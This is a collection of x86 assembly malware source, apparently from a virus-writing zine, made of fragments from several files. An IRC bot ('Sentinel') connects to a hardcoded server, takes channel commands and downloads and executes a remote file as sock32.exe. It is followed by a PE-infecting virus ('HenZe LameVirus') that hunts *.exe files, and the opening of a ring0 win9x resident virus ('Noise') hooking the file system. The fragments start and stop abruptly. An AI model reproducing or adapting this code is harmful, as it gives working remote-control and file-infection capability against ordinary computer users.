lea ebx, [ebp + AInternetGetConnectedState]
push ebx
push eax
call [ebp + AGetProcAddressA]
or eax, eax
jz UserIsOffline
CheckConnection:
push 00h
lea ebx, [ebp + buffer]
push ebx
call eax
or eax, eax
jnz UserIsOnline
UserIsOffline:
push 10000h
lea eax, [ebp + ASleep]
call GETAPI
jmp LoadWinInetDll
UserIsOnline:
lea eax, [ebp + mywsadata]
push eax
push 101h
lea eax, [ebp + AWSAStartup]
call GETWAPI
OpenSocket:
push 00h
push SOCK_STREAM
push AF_INET
lea eax, [ebp + Asocket]
call GETWAPI
mov [ebp + socketh], eax
GetSocketValues:
mov [ebp + mysocket.sin_family], AF_INET
mov eax, [ebp + servers]
lea esi, [ebp + server1]
call GET_ITEM_FROM_LIST
push esi
push ecx
GetPort:
lea esi, [ebp + port1]
mov ecx, 04
mul ecx
add esi, eax
mov edx, dword ptr [esi]
push edx
lea eax, [ebp + Ahtons]
call GETWAPI
mov [ebp + mysocket.sin_port], ax
pop ecx
lea eax, [ebp + Ainet_addr]
call GETWAPI
mov [ebp + mysocket.sin_addr], eax
Connect:
push 10h
lea eax, [ebp + mysocket]
push eax
push [ebp + socketh]
lea eax, [ebp + Aconnect]
call GETWAPI
test eax, eax
jnz Connect
LogonToIrcServer:
call LOGON
DoTheLoop:
call IRC_RECEIVE
or eax, eax
jz CloseSocket
jmp DoTheLoop
CloseSocket:
push [ebp + socketh]
lea eax, [ebp + Aclosesocket]
call GETWAPI
WSACleanUp:
lea eax, [ebp + AWSACleanup]
call GETWAPI
ExitThread:
popad
ret
IRC_THREAD endp
call IRC_RECEIVE
SendNick:
lea edi, [ebp + offset buffer]
lea esi, [ebp + offset nick]
mov ecx, 05h
rep movsb
lea esi, [ebp + name1]
mov eax, [ebp + names]
call GET_ITEM_FROM_LIST
rep movsb
mov ebx, 10d
call GET_RANDOM_NUMBER_WITHIN
add eax, 48d
mov byte ptr [edi], al
inc edi
mov ebx, 10d
call GET_RANDOM_NUMBER_WITHIN
add eax, 48d
mov byte ptr [edi], al
inc edi
lea esi, [ebp + crlf]
mov ecx, 03h
rep movsb
lea esi, [ebp + buffer]
call GET_STRING_SIZE
call IRC_SEND
call IRC_RECEIVE
SendUser:
lea edi, [ebp + buffer]
lea esi, [ebp + user1]
mov ecx, 05d
rep movsb
call CREATE_RANDOM_NAME
lea esi, [ebp + user2]
mov ecx, 18d
rep movsb
lea esi, [ebp + buffer]
call GET_STRING_SIZE
call IRC_SEND
call IRC_RECEIVE
call IRC_RECEIVE
SendJoin:
lea esi, [ebp + join]
mov ecx, 13d
call IRC_SEND
PostVersionMessage:
call .PostVersion
LogonDone:
ret
LOGON endp
IRC_RECEIVE proc
push 00h
push 400h
lea eax, [ebp + buffer]
push eax
push [ebp + socketh]
lea eax, [ebp + ARecv]
call GETWAPI
mov [ebp + nrbytes], eax
call IRC_SCANBUFFER
ret
IRC_RECEIVE endp
IRC_SEND proc
push 00h
push ecx
push esi
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
ret
IRC_SEND endp
.PostVersion:
lea edi, [ebp + buffer]
lea esi, [ebp + post]
mov ecx, 16d
rep movsb
lea esi, [ebp + post_vers]
mov ecx, 5d
rep movsb
lea esi, [ebp + version]
mov ecx, 4d
rep movsb
lea esi, [ebp + crlf]
mov ecx, 03d
rep movsb
lea esi, [ebp + buffer]
call GET_STRING_SIZE
call IRC_SEND
ret
.RespondPing:
lea edi, [ebp + buffer]
lea esi, [ebp + pong]
mov ecx, 04h
rep movsb
mov ecx, [ebp + nrbytes]
lea esi, [ebp + buffer]
call IRC_SEND
.RespondPing_End:
ret
IRC_SCANBUFFER proc
ScanDaBuffer:
mov ecx, [ebp + nrbytes]
lea esi, [ebp + buffer]
.PingPongMessage:
cmp dword ptr [esi], 'GNIP'
jne GetReplyNick
call .RespondPing
jmp EndLoop
GetReplyNick:
jecxz EndLoop
inc esi
dec ecx
cmp byte ptr [esi], '!'
je ExtractReplyNick
cmp byte ptr [esi], ':'
je EndLoop
jmp GetReplyNick
ExtractReplyNick:
push esi
push ecx
mov ecx, esi
lea esi, [ebp + buffer]
sub ecx, esi
dec ecx
inc esi
lea edi, [ebp + replynick]
rep movsb
mov byte ptr [edi], 00h
pop ecx
pop esi
ScanLoop:
jecxz EndLoop
cmp dword ptr [esi], 'VIRP'
je SearchTextStart
inc esi
dec ecx
jmp ScanLoop
SearchTextStart:
jecxz EndLoop
cmp byte ptr [esi], ':'
je .CommandMessage
inc esi
dec ecx
jmp SearchTextStart
.CommandMessage:
inc esi
dec ecx
cmp dword ptr [esi], 's54p'
jne EndLoop
GetText:
add esi, 5
sub ecx, 5
cmp byte ptr [esi], '/'
jne EndLoop
CheckIncomingCommandMessage:
inc esi
dec ecx
cmp dword ptr [esi], 'kc1n'
je CreateRandomNick
cmp dword ptr [esi], 't1uq'
je QuitIrc
cmp dword ptr [esi], 'c3xe'
je LaunchInstaller
cmp dword ptr [esi], 't4ts'
je InstallerStatus
call IRC_SEND
jmp EndLoop
CreateRandomNick:
lea edi, [ebp + mynick]
call CREATE_RANDOM_NAME
mov byte ptr [edi], 00h
lea edi, [ebp + buffer]
mov dword ptr [edi], 'KCIN'
add edi, 04h
mov byte ptr [edi], ' '
inc edi
lea esi, [ebp + mynick]
call GET_STRING_SIZE
rep movsb
lea esi, [ebp + crlf]
mov ecx, 03h
rep movsb
lea esi, [ebp + buffer]
call GET_STRING_SIZE
call IRC_SEND
jmp EndLoop
QuitIrc:
lea esi, [ebp + quit]
mov ecx, 06h
call IRC_SEND
xor eax, eax
jmp EndLoop
LaunchInstaller:
call INSTALLER_LAUNCH
jmp EndLoop
InstallerStatus:
call INSTALLER_STATUS
EndLoop:
ret
IRC_SCANBUFFER endp
version db "0101",0
post db "PRIVMSG #sntnl :",0
post_vers db "vers ",0
mynick db 5h dup(0)
replynick db 5h dup(0)
nrbytes dd 0
ircstatus dd 0
ircthreadid dd 0
wsock32 db "WSOCK32.dll",0
wininet db "WININET.dll",0
ASend db "send",0
ARecv db "recv",0
AWSAGetLastError db "WSAGetLastError",0
AWSAGetLastErrorA dd 0
AInternetGetConnectedState db "InternetGetConnectedState",0
ACreateThread db "CreateThread",0
AWSAStartup db "WSAStartup",0
AWSACleanup db "WSACleanup",0
Asocket db "socket",0
Aconnect db "connect",0
Aclosesocket db "closesocket",0
Ahtons db "htons",0
Ainet_addr db "inet_addr",0
AGetTickCount db "GetTickCount",0
AGetLastError db "GetLastError",0
ASleep db "Sleep",0
random_number dd 01234567h
ipaddress db "212.43.217.183",0
; if the bot does not appear online in #sentinel, try using a different
; server ip-address.
CREATE_RANDOM_NAME proc
call GetRandomChar
call GetRandomChar
call GetRandomChar
call GetRandomChar
call GetRandomChar
ret
GetRandomChar:
mov eax, 26d
call GET_RANDOM_NUMBER_WITHIN
add eax, 97d
mov byte ptr [edi], al
inc edi
ret
CREATE_RANDOM_NAME endp
GET_STRING_SIZE proc
GetStringSize:
xor ecx, ecx
SearchEndOfString:
cmp byte ptr [esi + ecx], 0h
je StringSizeFound
inc ecx
jmp SearchEndOfString
StringSizeFound:
ret
GET_STRING_SIZE endp
INSTALLER_LAUNCH proc
LaunchTheInstaller:
add esi, 05h
sub ecx, 05h
GetServerValue:
cmp byte ptr [esi], '['
jne ExitInstallerLaunch
inc esi
FoundServerValueStart:
mov edi, esi
xor edx, edx
GetServerLoop:
cmp byte ptr [esi], ']'
je StoreServerValue
inc esi
inc edx
dec ecx
cmp ecx, 00h
je ExitInstallerLaunch
jmp GetServerLoop
StoreServerValue:
mov esi, edi
push ecx
lea edi, [ebp + installer_server]
mov ecx, edx
rep movsb
pop ecx
GetGetCommand:
cmp byte ptr [esi], '['
je FilterGetCommand
inc esi
dec ecx
cmp ecx, 00h
je ExitInstallerLaunch
jmp GetGetCommand
FilterGetCommand:
inc esi
mov edi, esi
xor edx, edx
GetCommandLoop:
cmp byte ptr [esi], ']'
je SaveGetCommand
inc esi
inc edx
dec ecx
cmp ecx, 00h
je ExitInstallerLaunch
jmp GetCommandLoop
SaveGetCommand:
mov [ebp + installer_getsize], edx
mov esi, edi
mov ecx, edx
lea edi, [ebp + installer_get]
rep movsb
InstallerGo:
mov [ebp + installer_launchstatus], 00h
lea eax, [ebp + installerthreadid]
push eax
push 00h
push 1234567h
lea eax, [ebp + INSTALLER_THREAD]
push eax
push 10000h
push 00h
lea eax, [ebp + ACreateThread]
call GETAPI
ExitInstallerLaunch:
ret
INSTALLER_LAUNCH endp
INSTALLER_RECEIVE proc
SaveStack:
pushad
ReceiveData:
push edi
mov eax, [ebp + nrbytes2]
mov esi, dword ptr [ebp + dmHnd]
add esi, eax
push 00h
push edi
push esi
push [ebp + isocketh]
lea eax, [ebp + ARecv]
call GETWAPI
add [ebp + nrbytes2], eax
pop edi
InstallerProceed:
popad
ret
INSTALLER_RECEIVE endp
INSTALLER_STATUS proc
CheckInstallerStatus:
cmp [ebp + installer_launchstatus], 00h
je StatusWaiting
cmp [ebp + installer_launchstatus], 01h
je StatusInstalling
cmp [ebp + installer_launchstatus], 02h
je StatusDone
cmp [ebp + installer_launchstatus], 03h
je StatusConnectionError
cmp [ebp + installer_launchstatus], 04h
je StatusSizeError
jmp ExitInstallerStatus
StatusWaiting:
push 00h
push 28d
lea eax, [ebp + installer_stat00]
push eax
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
jmp ExitInstallerStatus
StatusInstalling:
push 00h
push 31d
lea eax, [ebp + installer_stat01]
push eax
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
jmp ExitInstallerStatus
StatusDone:
push 00h
push 25d
lea eax, [ebp + installer_stat02]
push eax
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
jmp ExitInstallerStatus
StatusConnectionError:
push 00h
push 38d
lea eax, [ebp + installer_stat03]
push eax
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
jmp ExitInstallerStatus
StatusSizeError:
push 00h
push 31d
lea eax, [ebp + installer_stat04]
push eax
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
ExitInstallerStatus:
ret
INSTALLER_STATUS endp
GetInstallerDelta:
pushad
call InstallerDelta
InstallerDelta:
pop ebp
sub ebp, offset InstallerDelta
AllocateExeMem:
push 1000000h
push GMEM_FIXED
lea eax, [ebp + AGlobalAlloc]
call GETAPI
InstallerWsaStartup:
lea eax, [ebp + mywsadata]
push eax
push 101h
lea eax, [ebp + AWSAStartup]
call GETWAPI
InstallerOpenSocket:
push 00h
push 01h
push 02h
lea eax, [ebp + Asocket]
call GETWAPI
mov [ebp + isocketh], eax
InstallerGetSocketValues:
mov [ebp + mysocket2.sin_family], 02h
push 80
lea eax, [ebp + Ahtons]
call GETWAPI
mov [ebp + mysocket2.sin_port], ax
InstallerConnect:
cmp ecx, 03h
je InstallerConnectionError
push ecx
push 10h
lea eax, [ebp + mysocket2]
push eax
push [ebp + isocketh]
lea eax, [ebp + Aconnect]
call GETWAPI
pop ecx
or eax, eax
jz InstallerSendGetCommand
inc ecx
jmp InstallerConnect
InstallerConnectionError:
mov [ebp + installer_launchstatus], 03h
jmp ExitInstaller
InstallerSendGetCommand:
push 00h
push [ebp + installer_getsize]
lea eax, [ebp + installer_get]
push eax
push [ebp + isocketh]
lea eax, [ebp + ASend]
call GETWAPI
push 00h
push 02h
lea eax, [ebp + crlf]
push eax
push [ebp + isocketh]
lea eax, [ebp + ASend]
call GETWAPI
push 00h
push 02h
lea eax, [ebp + crlf]
push eax
push [ebp + isocketh]
lea eax, [ebp + ASend]
call GETWAPI
ReceiveLoop:
cmp ecx, 400h
jna LastPart
sub ecx, 400h
mov edi, 400h
call INSTALLER_RECEIVE
jmp ReceiveLoop
LastPart:
mov edi, ecx
call INSTALLER_RECEIVE
SearchMz:
xor ecx, ecx
mov edi, dword ptr [ebp + dmHnd]
MzLoop:
cmp word ptr [edi], 'ZM'
je FoundExeMark
inc edi
inc ecx
SearchZm:
xor ecx, ecx
mov edi, dword ptr [ebp + dmHnd]
ZmLoop:
cmp word ptr [edi], 'MZ'
je FoundExeMark
inc edi
inc ecx
FoundExeMark:
mov [ebp + skip], ecx
ZeroWindirString:
mov ecx, 100h
xor eax, eax
lea edi, [ebp + windir]
rep stosb
InstallerGetSetWindowsDirectory:
call GET_WINDIR
call SET_WINDIR
push 00h
push 20h
push 02h
push 00h
push 01h
push 80000000h or 40000000h
lea eax, [ebp + commandline]
push eax
lea eax, [ebp + ACreateFile]
call GETAPI
mov [ebp + ifilehandle], eax
push 02h
push 00h
push 00h
push eax
lea eax, [ebp + ASetFilePointer]
call GETAPI
push 00h
lea edx, [ebp + bytesread]
push edx
push ebx
push edi
push [ebp + ifilehandle]
lea eax, [ebp + AWriteFile]
call GETAPI
InstallerGetRealSize:
lea ebx, [ebp + irealsize]
push ebx
push [ebp + ifilehandle]
lea eax, [ebp + AGetFileSize]
call GETAPI
mov [ebp + irealsize], eax
InstallerCloseFile:
push [ebp + ifilehandle]
lea eax, [ebp + ACloseHandle]
call GETAPI
GetFileSize:
mov edi, dword ptr [ebp + dmHnd]
xor ecx, ecx
InstallerFileSizeLoop:
cmp dword ptr [edi], ':htg'
je InstallerFoundSize
inc ecx
inc edi
cmp ecx, 200h
je InstallerCloseSocket
jmp InstallerFileSizeLoop
InstallerFoundSize:
xor ecx, ecx
add edi, 05h
mov [ebp + sizestart], edi
ExtractFileSizeLoop:
cmp word ptr [edi], 0a0dh
je FoundEndOfSizeString
inc edi
inc ecx
cmp ecx, 10h
je InstallerCloseSocket
jmp ExtractFileSizeLoop
FoundEndOfSizeString:
cld
mov [ebp + sizesize], ecx
mov [ebp + ifilesize], 00h
mov ebx, 01h
mov esi, [ebp + sizestart]
add esi, ecx
sub esi, 01h
Convert2Int:
xor eax, eax
lodsb
sub eax,'0'
mul ebx
add [ebp + ifilesize], eax
add edx, eax
dec esi
dec esi
dec ecx
cmp ecx, 00h
je InstallerCheckFileSize
push ecx
push esi
mov ecx, 10d
mov eax, ebx
mul ecx
mov ebx, eax
pop esi
pop ecx
jmp Convert2Int
InstallerCheckFileSize:
mov esi, [ebp + ifilesize]
mov edi, [ebp + irealsize]
cmp esi, edi
je ExecuteFile
mov [ebp + installer_launchstatus], 04h
jmp InstallerCloseSocket
ExecuteFile:
lea eax, [ebp + lpProcessInformation]
push eax
lea eax, [ebp + lpStartupInfo]
push eax
push 00h
push 00h
push CREATE_DEFAULT_ERROR_MODE
push FALSE
lea eax, [ebp + lpThreadAttributes]
push eax
lea eax, [ebp + lpProcessAttributes]
push eax
lea eax, [ebp + commandline]
push eax
push 00h
lea eax, [ebp + ACreateProcess]
call GETAPI
mov [ebp + installer_launchstatus], 02h
InstallerCloseSocket:
push [ebp + isocketh]
lea eax, [ebp + Aclosesocket]
call GETWAPI
ExitInstaller:
popad
ret
INSTALLER_THREAD endp
FALSE = 0
TRUE = 1
AWriteFile db "WriteFile",0
ACreateProcess db "CreateProcessA",0
AGlobalAlloc db "GlobalAlloc",0
commandline db "sock32.exe",0
dmHnd dd 0
ifilehandle dd 0
ifilesize dd 0
irealsize dd 0
isocketh dd 0
installerthreadid dd 0
GET_WINDIR proc
GetWindowsDir:
push 128h ; size of dirstring
lea eax, [ebp + windir] ; save it here
push eax
lea eax, [ebp + AGetWindowsDirectory] ; get windowsdir
call GETAPI
ret
GET_WINDIR endp
SET_WINDIR proc
SetWindowsDir:
lea eax, [ebp + windir] ; change to sysdir
push eax
lea eax, [ebp + ASetCurrentDirectory]
call GETAPI
ret
SET_WINDIR endp
;========================================================================;
Leap:
.code
OriginalHost:
pop ebx
push 00h
call ExitProcess
end FirstCopy
end
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SENTINEL.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MYINC.INC]ÄÄÄ
GMEM_FIXED = 0000h
PROCESS_INFORMATION struct
pi_hProcess HANDLE 0 ;process handle
pi_hThread HANDLE 0 ;thread handle
pi_dwProcessId DWORD 0 ;process id
pi_dwThreadId DWORD 0 ;thread id
PROCESS_INFORMATION ends
PROCESS_INFORMATION_ equ 4+4+4+4
STARTUPINFO struct
si_cb DWORD 0 ;structure size
si_lpReserved LPSTR 0 ;(reserved)
si_lpDesktop LPSTR 0 ;desktop name
sl_lpTitle LPSTR 0 ;console window title
si_dwX DWORD 0 ;window origin (column)
si_dwY DWORD 0 ;window origin (row)
si_dwXSize DWORD 0 ;window width
si_dwYSize DWORD 0 ;window height
si_dwXCountChars DWORD 0 ;screen buffer width
si_dwYCountChars DWORD 0 ;screen buffer height
si_dwFillAttribute DWORD 0 ;console window initialization
si_dwFlags DWORD 0 ;structure member flags
si_wShowWindow WORD 0 ;ShowWindow() parameter
si_cbReserved2 WORD 0 ;(reserved)
si_lpReserved2 LPBYTE 0 ;(reserved)
si_hStdInput HANDLE 0 ;standard input handle
si_hStdOutput HANDLE 0 ;standard output handle
si_hStdError HANDLE 0 ;standard error handle
STARTUPINFO ends
STARTUPINFO_ equ 4+4+4+4+4+4+4+4+4+4+4+4+2+2+4+4+4+4
SEH struct
m_pSEH DWORD 0
m_pExcFunction DWORD 0
SEH ends
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MYINC.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WSOCKS.INC]ÄÄÄ
;
; WSocks.inc: include file for windows sockets .
; Designed for TASM5 and Win32.
;
; (C) 1999 Bumblebee.
;
; This file contains basic structures and stuff to work
; with windows sockets.
;
; closes a socket
; socket descriptor
;
extrn closesocket:PROC
; sends data (this socks are a shit... Unix uses simple write)
; flags (1 OOB data or 0 normal ) , length, addr of buffer, socket
; returns: caracters sent or SOCKET_ERR on error
extrn send:PROC
; reveives data (this socks are a shit... Unix uses simple read)
; flags (use 0), length, addr of buffer, socket
; returns: caracters sent or SOCKET_ERR on error
extrn recv:PROC
; connects to a server
; sizeof struct SOCKADDR, struct SOCKADDR, socket
; returns: SOCKET_ERR on error
extrn connect:PROC
; Structs :o
; sockaddr struct for connection
; modified (for better use)
; if you want the original look for it into a winsock.h
SOCKADDR struct
sin_family dw 0 ; ex. AF_INET
sin_port dw 0 ; use htons for this
sin_addr dd 0 ; here goes server node (from inet_addr)
sin_zero db 8 dup(0)
SOCKADDR ends
; types of sockets
SOCK_STREAM equ 1 ; stream (connection oriented; telnet like)
SOCK_DGRAM equ 2 ; datagram (packets, packets, packets)
; protocol
PCL_NONE equ 0 ; none (define the protocol not needed)
.586P
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MACROSIZE MACRO
ENDM
; MOV \
; CALL \
; JNZ \ ONLY SIX OPCODES WERE USED.. xDDD
; ADD /
; SUB /
; CMP /
;MOV EAX,[EBP+5]
;TURNS INTO:
; ADD EBP,5
; MOV EAX,[EBP]
;AND SO...
; *INFINITE* THX TO T00FiC FOR THE REDUCED OPCODE SET IDEA AND
.DATA
BUSCA3:
ADD EAX,1
CMP DWORD PTR [EAX],EDX
JNZ SHORT BUSCA3
APIZ:
MOV [EDI],EAX
ADD EDI,4
NPI:
MOV AL,BYTE PTR [ESI]
ADD ESI,1
CMP AL,0
JNZ SHORT NPI
CMP [ESI], AL
JNZ GPI
INFECT:
MOV EAX, OFFSET Win32FindData
ADD EAX,EBP
SUB EAX,OFFSET DELTA
SUB ESP,4
MOV [ESP],EAX
MOV EAX,OFFSET IMASK
ADD EAX,EBP
SUB EAX,OFFSET DELTA
SUB ESP,4
MOV [ESP],EAX
MOV EAX,OFFSET FindFirstFile
ADD EAX,EBP
SUB EAX,OFFSET DELTA
CALL [EAX]
MOV EBX, OFFSET SearcHandle
ADD EBX,EBP
SUB EBX,OFFSET DELTA
MOV [EBX],EAX
LOOPER:
CMP EAX,-1
JNZ SUPPER
WARNING:
MOV EAX,12345678H
ORG $-4
OLD_EIP DD 00401000H
ADD ESP,4
CALL EAX ; SUXXX!!! I DONT WANT TO WASTE JMP HERE
SUPPER:
CMP EAX,0
JNZ ALLKEY
PILLE:
CMP ESP,0 ; ESP NEVER IS ZERO
JNZ WARNING
ALLKEY:
SUB ESP,4
MOV EAX,OFFSET OLD_EIP
ADD EAX,EBP
SUB EAX,OFFSET DELTA
MOV EBX,[EAX]
MOV [ESP],EBX
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],00000080h
SUB ESP,4
MOV [ESP],3
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],0C0000000h
MOV EDX,0
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],ECX
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],4H
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV EBX,OFFSET FileHandle
ADD EBX,EBP
SUB EBX,OFFSET DELTA
MOV ECX,[EBX]
MOV [ESP],ECX
MOV EAX, OFFSET CreateFileMappingA
ADD EAX,EBP
SUB EAX,OFFSET DELTA
CALL [EAX]
MOV EDX,0
SUB ESP,4
MOV [ESP],ECX
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],EDX
ADD EDX,2
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV ECX, OFFSET MapHandle
ADD ECX,EBP
SUB ECX,OFFSET DELTA
MOV EBX,[ECX]
MOV [ESP],EBX
MOV EBX, OFFSET MapViewOfFile
ADD EBX,EBP
SUB EBX,OFFSET DELTA
CALL [EBX]
Cerrar1:
SUB ESI,MARKA
MOV EBX,ESI
ADD EBX,3CH
MOV EAX,[EBX] ; ONLY SOME W98 HAVE 1000H/1000H INSTEAD 1000H/200H
MOV ECX,ESI
ADD ECX,56
CMP EAX,[ECX]
JNZ Cerrar
SUB ESP,4
MOV [ESP],ESI
MOV ECX,0
MOV EDI,ESI
ADD EDI,6
MOV CL,BYTE PTR [EDI]
ADD EDI,74H-6
MOV EBX,[EDI]
ADD EBX,EBX
ADD EBX,EBX
ADD EBX,EBX
ADD ESI,78H
ADD ESI,EBX
ADD ESI,24H
WRI:
MOV DWORD PTR [ESI], 0C0000040h
ADD ESI,40
SUB ECX,1
CMP ECX,0
JNZ WRI
MOV ESI,[ESP]
ADD ESP,4
MOV EDI,ESI
ADD ESI,28H
MOV EAX,[ESI]
ADD ESI,34H-28H
ADD EAX,[ESI]
MOV ECX,[ESI]
MOV EDX,OFFSET BASE
ADD EDX,EBP
SUB EDX,OFFSET DELTA
MOV [EDX],ECX
MOV EBX,OFFSET OLD_EIP
ADD EBX,EBP
SUB EBX,OFFSET DELTA
MOV [EBX],EAX
MOV ESI,EDI
ADD ESI,MARKA
MOV BYTE PTR [ESI],"H" ; HenKy!
MOV EAX,OFFSET WFD_nFileSizeLow
ADD EAX,EBP
SUB EAX,OFFSET DELTA
MOV ECX,[EAX]
MOV EAX,EDI
BU:
CMP DWORD PTR [EDI], 'XGNI'
JNZ PE
CMP ESP,0
JNZ PO
PE:
ADD EDI,1
SUB ECX,1
CMP ECX,0
JNZ BU
CMP ESP,0
JNZ Cerrar
PO:
MOV ESI,EDI
ADD ESI,4
CMP DWORD PTR [ESI], 'DAPX'
JNZ PE
SUB ESP,4
MOV [ESP],EDI
MOV EBX,OFFSET MapAddress
ADD EBX,EBP
SUB EBX,OFFSET DELTA
SUB EDI,[EBX]
ADD EAX,28H
MOV [EAX],EDI
MOV EBX,OFFSET BASE
ADD EBX,EBP
SUB EBX,OFFSET DELTA
ADD EDI,[EBX]
ADD EDI,5
MOV EDX,OFFSET MILO
ADD EDX,EBP
SUB EDX,OFFSET DELTA
MOV [EDX],EDI
MOV EDI,[ESP]
ADD ESP,4
MOV EAX,[ESI]
MOV [EDI],EAX
ADD ESI,4
ADD EDI,4
SUB ECX,1
CMP ECX,0
JNZ BASTARDO_VIRUS
UnMapFile:
CloseMap:
Cerrar:
TOPO:
APIs:
DB "CreateFileA",0
DB "CloseHandle",0
DB "FindFirstFileA",0
DB "FindNextFileA",0
DB "MapViewOfFile",0
DB "UnmapViewOfFile",0
DB "CreateFileMappingA",0
Zero_ DB 0
BASE DD 0
IMASK DB '*.ExE',0
DB 'HenZe LameVirus BY HenKy',0
align 4
APIaddresses:
CreateFile DD 0
CloseHandle DD 0
FindFirstFile DD 0
FindNextFile DD 0
MapViewOfFile DD 0
UnmapViewOfFile DD 0
CreateFileMappingA DD 0
GPA DD 0
SearcHandle DD 0
FileHandle DD 0
MapHandle DD 0
MapAddress DD 0
FILETIME STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
FILETIME ENDS
Win32FindData:
WFD_dwFileAttributes DD ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD ?
WFD_nFileSizeLow DD ?
WFD_dwReserved0 DD ?
WFD_dwReserved1 DD ?
FNAME DD 0
DD 0
DD 0
DD 0
DD 0
DD 0
align 4
EXITPROC:
PUSH 0
CALL ExitProcess
ENDS
END MEGAMIX
;
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
; ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
; Noise ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
; Coded by Bumblebee/29a ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ Words from the author ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
; . I started to code an i-worm and i wanted to make something like a
; ring0 stealth routine for it. Then i realized: i did a ring0 virus heh
; The name is due the little payload it has... that does realy noise!
; That's my first ring0 virus. I don't like codin ring0, but here it is.
; That's a research spezimen. Don't expect the ultimate ring0 virus...
; Only 414 bytes, that's less than MiniR3 (aka Win95.Rinim).
;
; ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ Disclaimer ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ
; . This is the source code of a VIRUS. The author is not responsabile
; of any damage that may occur due to the assembly of this file. Use
; it at your own risk.
;
; ÚÄÄÄÄÄÄÄÄÄÄ¿
; ³ Features ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÀÄÄÄÄÄÄÄÄÄÄÙ
; . Ring0 resident win9x virus (thus coz the way it uses to get ring0 is
; only for win9x, not nt not w2k).
; . It infect in similar way like MiniR3 does. Uses free space in the
; PE header. That's a cavity virus.
; . All the data is INSIDE the code. Well... copyright is not inside :)
; . It infects PE files in the user buffer when a write call is done.
; That makes this virus not very efficient spreading.
; . It has a kewl sound payload. Makes echo with internal speaker for
; all disk operations ;)
;
; Greetz to Perikles for his tests ;) You're my best tester, you know...
;
;
; The way of the bee
;
.486p
locals
.model flat,STDCALL
extrn ExitProcess:PROC
.DATA
; dummy data
db 'WARNING - This is a virus carrier - WARNING'
.CODE
inicio:
mov eax,VSIZE
cmp al,0bfh
jne NotWin9x
pop edi
pop esi
mov word ptr [esi],di
shr edi,10h
mov word ptr [esi+6],di
NotWin9x:
add esp,8
popad
ring0CodeInstaller:
pushad
mov ebp,0bff70000h
sub ebp,dword ptr [ebp]
jz ReturnR3
push VSIZEROUND
VxDCall IFSMANAGER,GETHEAP
pop edi
or eax,eax
jz ReturnR3
mov edi,eax
call @@delta
@@delta:
pop esi
sub esi,(offset @@delta-offset vBegin)
mov ecx,VSIZE
rep movsb
push eax
add eax,offset ring0Hook-offset vBegin
push eax
VxDCall IFSMANAGER,IFSAPIHOOK
pop ebp
pop edx
mov dword ptr [edx+nextHookInChain-vBegin],eax
mov ebp,0bff70000h
mov dword ptr [ebp],ebp
ReturnR3:
popad
iretd
ring0Hook:
pop eax
push ebp
mov ebp,12345678h
delta equ $-4
mov dword ptr [returnAddr-vBegin+ebp],eax
push edx
mov edx,esp
pushad
pushfd
mov ecx,0ffh
counter equ $-4
dec cl
jz beep
exitHook:
popfd
popad
pop edx
pop ebp
mov eax,12345678h
nextHookInChain equ $-4
call dword ptr [eax]
